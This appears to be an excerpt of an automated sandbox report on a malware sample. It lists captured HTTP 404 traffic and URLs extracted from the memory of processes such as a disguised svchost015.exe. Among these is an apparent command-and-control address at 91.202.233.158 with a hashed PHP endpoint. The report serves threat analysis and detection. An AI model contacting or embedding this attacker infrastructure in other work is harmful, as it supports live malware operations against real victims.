Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Source: svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php4
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php5d1ef941bc7800
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php6
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpF
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpO
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpZ
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpws
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/ws
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158Gk
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158j
Source: explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2163021353.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3142709403.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3140422641.0000000008C3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137154672.0000000008C3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2163021353.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3142709403.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3140422641.0000000008C3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137154672.0000000008C3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2163021353.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3142709403.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3140422641.0000000008C3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137154672.0000000008C3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2163021353.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3142709403.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3140422641.0000000008C3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137154672.0000000008C3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: explorer.exe, 00000002.00000000.2161155359.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2161168607.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2159653301.00000000028A0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: http://www.x-ways.net/order
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: http://www.x-ways.net/order.html-d.htmlS
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: http://www.x-ways.net/winhex/license
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: http://www.x-ways.net/winhex/license-d-f.htmlS
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: http://www.x-ways.net/winhex/subscribe
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: http://www.x-ways.net/winhex/subscribe-d.htmlU
Source: explorer.exe, 00000002.00000000.2163555147.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.2166104527.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 0000000C.00000002.3367028354.000000000B390000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2166104527.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: https://github.com/tesseract-ocr/tessdata/
Source: explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
